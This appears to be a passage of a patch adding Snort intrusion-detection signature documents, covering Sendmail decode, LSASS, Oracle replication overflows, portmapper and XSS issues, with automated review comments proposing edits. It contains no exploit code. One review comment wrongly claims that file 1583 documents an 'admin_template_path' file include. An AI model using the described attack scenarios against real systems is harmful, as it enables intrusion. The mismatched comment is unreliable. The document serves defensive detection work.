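Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") and the Attack Scenarios entry ("An attacker can access an authentication mechanism and supply his/her own credentials") are authentication-bypass boilerplate and do not describe the remote file include via "admin_template_path" that the Summary documents; suggest dropping them and keeping the scenario to the remote include. Also "running ona web server" should be "running on a web server", "exploitation attempt has been attempted" is redundant, and the file ends with a trailing empty line that the other files do not have.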
--- /dev/null
+++ b/doc/signatures/1583.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1583
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
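Review bot: with "Rule:" empty and both Summary and Detailed Information generic ("a known vulnerability on a web server or a web application"), the file gives no way to tell what request this sid matches, which makes the "None known" False Positives claim hard to justify for ordinary web traffic; suggest stating the matched pattern in the Summary or filling the Rule: section. "attackers choosing" should be "attacker's choosing".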
--- /dev/null
+++ b/doc/signatures/488.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+488
+
+--
+Summary:
+This event is generated when a connection is closed from a resource
+external to the protected network.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that an established connection has been closed
+from a source external to the protected network. Since the external
+connection port is 80, this is unusual behavior. It may be that an
+attacker is using port 80 on the external machine to initiate a
+connection to a machine on the protected network in an attempt to bypass
+firewall protection. When this connection is terminated, this rule will
+generate an event.
+
+--
+Affected Systems:
+	All systems
+	
+--
+Attack Scenarios:
+An attacker can use port 80 from a compromised machine to connect to
+another compromised host in an attempt to bypass firewall restrictions
+by imitating normal web traffic.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Investigate the host for signs of system compromise.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
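Review bot: the Summary omits the condition that makes this event interesting. Detailed Information says "Since the external connection port is 80, this is unusual behavior", but established connections to an external port 80 are ordinary outbound web browsing and the remote web server closing them is routine, so the statement only holds if the rule also checks flow direction (a connection initiated from outside). Suggest stating that condition in the Summary and in the currently empty Rule: section, and reconsidering "None known" under False Positives in light of it.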
--- /dev/null
+++ b/doc/signatures/672.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+672
+
+--
+Summary:
+This event is generated when a remote user attempts to scan for a vulnerability in the VRFY command on internal SMTP servers.
+
+--
+Impact:
+Information gathering, possibly leading to a future attack and system compromise. 
+
+--
+Detailed Information:
+If the decode alias on the Sendmail server is enabled, an attacker may be able to send messages to the decode alias email address, creating or overwriting files on the server. Vulnerability scanners use the "vrfy decode" command to verify that a decode alias is enabled.
+
+--
+Affected Systems:
+Systems running Sendmail.
+
+--
+Attack Scenarios:
+An attacker scans the server to determine that the decode alias exists. The attacker then sends an email address to the decode alias on the server, with directives to overwrite or create files on the server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the decode alias by commenting out the "decode |/usr/bin/uudecode" line in your Sendmail aliases file.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0096
+
+--
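Review bot: in Attack Scenarios "The attacker then sends an email address to the decode alias" should be "sends an email message to the decode alias". Corrective Action tells the reader to comment out the "decode |/usr/bin/uudecode" line but not that the aliases database must be rebuilt afterwards (newaliases, or sendmail -bi) for the change to take effect; suggest adding that step.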
--- /dev/null
+++ b/doc/signatures/945.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+945
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
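Review bot: the Affected Systems section is empty; the Summary scopes the rule to "a web server or an application running on that server", so at least that should be stated there, as the other generic web files do ("All systems using a web server."). Also "running ona web server" should be "running on a web server".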
--- /dev/null
+++ b/doc/signatures/1923.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1923
+
+--
+Summary:
+This event is generated when an attempt is made to forward a Remote Procedure Call (RPC) request through the portmapper service.
+
+--
+Impact:
+Information disclosure.  This can detect and request RPC services offered.
+
+--
+Detailed Information:
+The RPC "callit" procedure allows the portmapper to act as a proxy to forward requests to other RPC services offered by the host. This allows an attacker to call an RPC service on the same host without knowing the port number associated with the RPC service.    
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can use the portmapper proxy to circumvent any required authentication when sending requests to the actual port associated with an RPC service.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+According to RFC 1057, this proxy feature supports broadcasts to RPC services using the well-known portmapper port. 
+
+This rule also generates an event when legitimate hosts attempt to use the proxy feature.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc1057.txt
+
+
+--
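Review bot: the Impact sentence "This can detect and request RPC services offered." is unclear about who detects what; from Detailed Information the point is that an attacker can enumerate and call RPC services through the portmapper proxy without knowing their ports, so suggest "Information disclosure. An attacker can discover and call RPC services offered by the host via the portmapper." The "callit" procedure should also be given its RFC 1057 name, PMAPPROC_CALLIT, since that RFC is the only reference listed.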
--- /dev/null
+++ b/doc/signatures/2488.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2488
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with winzip's processing of certain MIME archive files. 
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running winzip.
+
+--
+Detailed Information:
+Winzip is a program that is used for file compression on Windows hosts.
+A buffer overflow exists when parsing specific header fields for certain 
+MIME file types.  An overly long value passed to the Content-Disposition
+name field may trigger the buffer overflow and allow the execution of 
+arbitrary code in the context of the user running winzip.
+
+--
+Affected Systems:
+Winzip 6.x, 7.x, 8.0, 8.1 SR-1, 8.1, Winzip 9.0 beta versions
+
+--
+Attack Scenarios:
+An attacker can entice a user to open a malformed MIME file that will
+invoke winzip to process it, possibly causing a a buffer overflow 
+and the subsequent execution of arbitrary code on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://securityfocus.com/bid/9758
+
+--
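Review bot: "Additional References" is missing its trailing colon, unlike every other section header in the file, which matters if the documents are parsed by header string. Also "possibly causing a a buffer overflow" doubles "a", and the Affected Systems list "8.0, 8.1 SR-1, 8.1" should be ordered "8.0, 8.1, 8.1 SR-1". Minor: the product is written "Winzip" throughout; the vendor spells it "WinZip".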
--- /dev/null
+++ b/doc/signatures/713.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+713
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Lucent/Livingston Portmaster router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an attempt is made to issue a Denial of
+Service (DoS) attack against a Livingston/Lucent router. In some
+situations malformed data sent to the Telnet service on the router can
+cause the DoS to occur.
+
+Lucent Portmaster routers were previously known as Livingston Portmaster
+from Livingston Technologies.
+
+--
+Affected Systems:
+	Lucent Portmaster 1.0
+	Lucent Portmaster 2.0
+	Lucent Portmaster 3.0
+
+--
+Attack Scenarios:
+The attacker can use one of the publicly available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+The Portmaster series of routers is no longer available.
+
+Disable the Telnet service if possible.
+
+Reboot the router to regain the service
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2225
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0218
+
+--
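Review bot: the blank line between "Rule:" and the first "--" is missing at the top of the file, unlike the other files; "Reboot the router to regain the service" in Corrective Action lacks its full stop, and "None known" under False Positives lacks the period that "None known." has under False Negatives. Suggest normalising these so the files stay consistent with each other.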
--- /dev/null
+++ b/doc/signatures/496.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 496
+
+-- 
+Summary:
+This event is generated by the successful completion of a directory listing operation. This may be indicative of post-compromise behavior indicating the use of a Windows command shell for listing directory contents.
+
+-- 
+Impact: 
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated when a standard Windows command for listing directories is executed. The string "Directory of" is typically shown in front of the directory listing on Windows NT/2000/XP.  
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has successfully executed at least one command to list the contents of a directory directory. Note that the source address of this event is actually
+the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then proceeds to look for interesting files on the compromised server via the "dir" command.
+
+-- 
+
+Ease of Attack: 
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives: 
+This rule will generate an event if the string "Directory of" appears in the content distributed by a web server, in which case the rule should be tuned.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
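Review bot: the Affected Systems section is missing entirely from this file (Detailed Information is followed directly by "Attack Scenarios:"), even though the text identifies the platforms ("Windows NT/2000/XP"); suggest adding it. Also "the contents of a directory directory" doubles the word, "gains an access" should be "gains access", and the extra blank line after several "--" separators differs from the other files.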
--- /dev/null
+++ b/doc/signatures/100000835.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000835
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Lazarus" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "img" parameter in the "picture.php" script used by the "Lazarus" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Lazarus
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
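Review bot: the Impact text ("system integrity compromise", "unauthorized administrative access to the server", "execution of arbitrary code") is the remote-file-include boilerplate and does not fit a cross site scripting issue via the "img" parameter, where script runs in the victim's browser and the realistic consequence is the information theft that Attack Scenarios already describes; suggest rewriting Impact around session or credential theft and script execution in the user's browser. The file also starts with two empty lines and ends with one, unlike the others.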
--- /dev/null
+++ b/doc/signatures/2769.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2769
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_mview_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
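Review bot: the procedure sentence is again broken across lines ("vulnerability in the procedure drop_mview_repobject" / ". This procedure is included in" / "dbms_repcat."), and the package is given without a schema prefix where the sibling file for create_snapshot_repgroup writes "sys.dbms_repcat_sna"; suggest joining the sentence and being consistent about the prefix. "Rule:" and "Additional References:" are empty here as well.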
--- /dev/null
+++ b/doc/signatures/2510.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2510
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
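Review bot: "suscessful exploitation" and "An attcker" should be "successful exploitation" and "An attacker", and the comma in "an unchecked buffer in the LSASS service, suscessful exploitation may ..." joins two sentences (use a full stop). Additional References is empty for a known LSASS buffer overrun; the vendor bulletin should be listed so that "Apply the appropriate vendor supplied patches" is actionable.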
--- /dev/null
+++ b/doc/signatures/122-4.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-4
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
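Review bot: Two misspellings in this file: "reconnaisance" under Impact should be "reconnaissance", and "consititute" in the first line of Detailed Information should be "constitute". The last Corrective Action line repeats itself ("Apply any appropriate vendor supplied patches as appropriate"); drop one of the two "appropriate"s. Since False Positives already says the pre-processor should be tuned for authorised audits and Detailed Information points at README.sfportscan, Corrective Action could carry a one-line pointer to that tuning instead of leaving the reader to connect the two sections.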
--- /dev/null
+++ b/doc/signatures/2600.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2600
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "add_grouped_column" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
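Review bot: Ease of Attack says "Simple." while Attack Scenarios states the attacker must first log on with a valid username and password; the rating should mention that authenticated access is a precondition, the way other entries in this patch mention exploit availability. "a Oracle database implementation" in Summary should read "an Oracle database implementation". The $ORACLE_PORTS sentence in Detailed Information is rule-tuning advice rather than information about the vulnerability; move it to Corrective Action or label it as a Snort variable so it is not read as an Oracle configuration step. Additional References lists only a third-party policy check; the vendor advisory for the add_grouped_column issue should be added alongside it.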
--- /dev/null
+++ b/doc/signatures/1496.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1496
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
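Review bot: "running ona web server" in the second line of Detailed Information should be "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". More importantly, the file is generic CGI boilerplate: nothing says which script Sid 1496 fires on, Affected Systems reads "All systems running CGI applications", and Additional References is empty although Ease of Attack claims "Exploits exist". At minimum the Summary should name the script the rule matches and a reference for the vulnerability should be given.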
--- /dev/null
+++ b/doc/signatures/1174.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1174
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
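Review bot: This file is word for word the same as 1496.txt in this patch, down to the "running ona web server" typo and the empty Additional References; the same corrections apply, and Summary and Affected Systems should be specialised to whatever Sid 1174 actually matches, otherwise the two documents cannot be told apart.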
--- /dev/null
+++ b/doc/signatures/2015.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2015
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+need for detailed network information. Some versions of RPC have a 
+vulnerability that allows an a remote host to register (and un-register)
+applications from a spoofed source.
+
+--
+Impact:
+Possible denial of service (DoS) against the target host. Potential 
+remote root compromise of the target system.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that could allow 
+an attacker capable of spoofing UDP packets to set and unset calls to 
+arbitrary RPC programs.
+
+A denial of service could be instigated against the target machine that 
+could render network file system services and other such network 
+available services unavailable to network users.
+
+It is also possible for the attacker to gain super user access depending
+on the RPC service he is able to register. This could then lead to a
+compromise of all resources on the network the victim is attached to.
+
+--
+Affected Systems:
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof UDP packets for pmap_set to 
+register an RPC service. The attacker might also spoof UDP packets to 
+un-register needed services via pmap_unset.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+BugTraq:
+http://www.securityfocus.com/bid/1892
+
+--
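Review bot: "allows an a remote host" in Summary should be "allows a remote host". The Summary also gives three sentences of general RPC background before saying what the event means; the other entries in this patch open with "This event is generated when ...", and this one should too, with the background moved to Detailed Information. The Corrective Action sentence "filter RPC ports at the firewall to ensure access is denied to RPC enabled machines" is ambiguous about direction; state that inbound access from outside the local network to the portmapper port is what must be denied. "the RPC service he is able to register" can become "the RPC service that can be registered".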
--- /dev/null
+++ b/doc/signatures/2670.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+2670
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+pgpmail.pl.
+
+-- 
+Impact: 
+Possible unauthorized administrative access to the victim host.
+
+--
+Detailed Information:
+The script pgpmail.pl does not properly sanitize user supplied input.
+This may allow an attacker to supply commands of their choosing to the
+victim host with the privileges of the user running the web server.
+
+--
+Affected Systems:
+	pgpmail prior to and including 3.6
+
+--
+Attack Scenarios: 
+An attacker can supply arbitrary commands to the pgpmail.pl script.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script pgpmail.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
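Review bot: Impact ("Possible unauthorized administrative access to the victim host") overstates what Detailed Information describes, which is command execution with the privileges of the web server user; align the two, or say that administrative access would require a further local step. Several headers in this file carry trailing whitespace ("Rule: ", "Sid: ", "-- "), unlike the other files in the patch; strip it so the files stay uniform. The second Corrective Action line is missing its period, and Additional References is empty even though Affected Systems gives a specific version range for pgpmail.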
--- /dev/null
+++ b/doc/signatures/3358.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3358
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
